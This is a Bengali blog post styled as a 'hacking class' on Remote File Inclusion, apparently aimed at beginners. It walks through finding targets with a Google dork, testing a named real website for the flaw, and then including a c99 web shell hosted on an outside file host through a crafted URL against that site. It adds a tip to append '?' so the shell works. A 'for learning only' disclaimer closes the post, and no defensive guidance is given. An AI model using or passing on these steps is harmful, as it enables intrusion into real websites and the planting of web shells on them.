আসসালামু আলাইকুম, সবাইকে আবারও স্বাগতম আজকের হ্যাকিং ক্লাসে। কেমন আছেন সবাই? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে পরিবার-পরিজন, আত্মীয়-স্বজন ও পাড়া-প্রতিবেশিদের নিয়ে খুবই ভাল আছেন। ভাল থাকেন ও ভাল রাখেন আপনার পাশের মানুষটিকে। কেউ খারাপ থাকলেই আমাকে বলবেন ।যদিও আমি ফানের লোক না।
কোন সাইটটি vulnerable ? কিভাবে বুঝবেন? খুবই কঠিন প্রশ্ন, তাই না? এই প্রশ্নের উত্তর জানার জন্য নিচের লিংকটি দেখেন….
আজ দেখাব Remote file inclusion হ্যাকিং। ওহ! আপনারা হয়ত জানেন না যে, হ্যাকিং করার থেকে হ্যাকিং নিয়ে পোষ্ট লেখা আরও কঠিন ও কষ্টকর। যদি পোষ্ট করতেন তাহলে বুঝতেন। থাক পোষ্ট করা লাগবে না, শুধু মন্তব্য করলেই হবে। মন্তব্য করলে পোষ্টের টিজেরা উৎসাহিত হয়। এতে তাদের লেখার গতি ও স্বাচন্দ্যও বাড়ে। তাহলে আর কথা নয় এবার শুরু হয়ে যাক পোষ্টটি…..
Remote file inclusion হ্যাকিং, একে সংক্ষেপে বলে RFI হ্যাকিং। এটি অনন্যা হ্যাকিং ম্যাথডের মধ্যে এটিও একটি অন্যতম জনপ্রিয় ম্যাথড। অন্যন্যা পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এই vulnerability এর মাধ্যমে একজন হ্যাকার একটি ওয়েব সার্ভারের remote file যুক্ত করতে পারে। আশা করি RFI হ্যাকিং সম্পর্কে মোটামুটি ধারণা পেয়েছেন।
——————————————————————————————————————————————————কোন সাইটটি vulnerable ? কিভাবে বুঝবেন? খুবই কঠিন প্রশ্ন, তাই না? এই প্রশ্নের উত্তর জানার জন্য নিচের লিংকটি দেখেন….
http://www.targetsite.com/index.php?page=Anything
উপরের লিংকের মতোই দেখতে পাবেন, যেগুলো আপনি খুঁজচ্ছেন তন্ন তন্ন করে। এখন এগুলো বাহির করবেন কিভাবে? গুগল ডক দরকার ? নিন নিচে গুগল ডক দিলাম।
“inurl:index.php?page=”
উপরের ডকটি গুগলে নিয়ে সার্চ দিন। তাহলে আপনাকে “index.php?page=” এই টাইপের যত ওয়েবসাইট আছে, সবগুলো ওয়েবসাইট গুগল আপনার সামনে এনে হাজির করবে। এখন কোন ওয়েবসাইটটি আজকের ম্যাথডের জন্য vulnerable তা পরীক্ষা করে দেখতে হবে। কিভাবে করবেন ? নিচের মতো করে করুন।
http://www.targetsite.com/index.php?page=www.google.com
এখন মনে করেন আমি আমি http://www.cbspk.com/ এই সাইটটি খুঁজে পেয়েছি। এখন আমরা চাইব এটা vulnerable কি না। তাহলে লিখুন….
http://www.cbspk.com/v2/index.php?page=http://www.tunerpage.com
তাহলে এটি দেখাবে…
এখন যদি উক্ত ওয়েবসাইটটি অন্য ওয়েবসাইট নিয়ে খোলে তাহলে বুঝবেন যে এই ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে। এবার আসুন পরের ধাপে…
এরপর সাধারণত হ্যাকাররা তার ভিকটিমের ওয়েবসাইটে যে কোন Shells আপলোড করে, যাতে তার কাজটি সবাইকে দেখাতে । মানে প্রমাণটি। বেশিরভাগ হ্যাকাররা c99 shell বা r57 shell আপলোড করে। আমি আপনাদের দেখাব c99 shell আপলোড করা। এজন্য হ্যাকাররা যে কোন একটি ওয়েবহোষ্টটিং সাইটে তাদের সেল আপলোড করে নেয়। যেমন- ripway.com, 110mb.com ইত্যাদি। এখন মনে করেন আমি ripway.com এই সাইটে সেল আপলোড করলাম। তাহলে আমার লিংক হবে…
http://h1.ripway.com/tjunselected/c99shell.php?
এবার হ্যাকার ওয়েবসাইটটিতে একটি কমান্ড দিবে। কমান্ডটি হবে
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/tjunselected/c99shell.php?
এখন তাহলে এটি ওয়েবসাইট দেখব। দেখেন, কি দেখেন ?
তবে অবশ্যই মনে রাখবেন লিংকের শেষে “ ? ” প্রশ্নবোধক চিহ্নটি লাগিয়ে দিবেন। নতুবা আপনার শেল কাজ করবে না।
- এই পোষ্টটি শুধু মাত্র শিখার উদ্দেশ্য। কারও ক্ষতি করার উদ্দেশ্যে করা হয় নি। তাই এই পোষ্টে অপব্যবহার কেউ করবেন না। অপব্যবহার করার ফলে কারও ক্ষতি হলে আমি দায়ী নই।
কোন মন্তব্য নেই:
একটি মন্তব্য পোস্ট করুন
thanks for comment me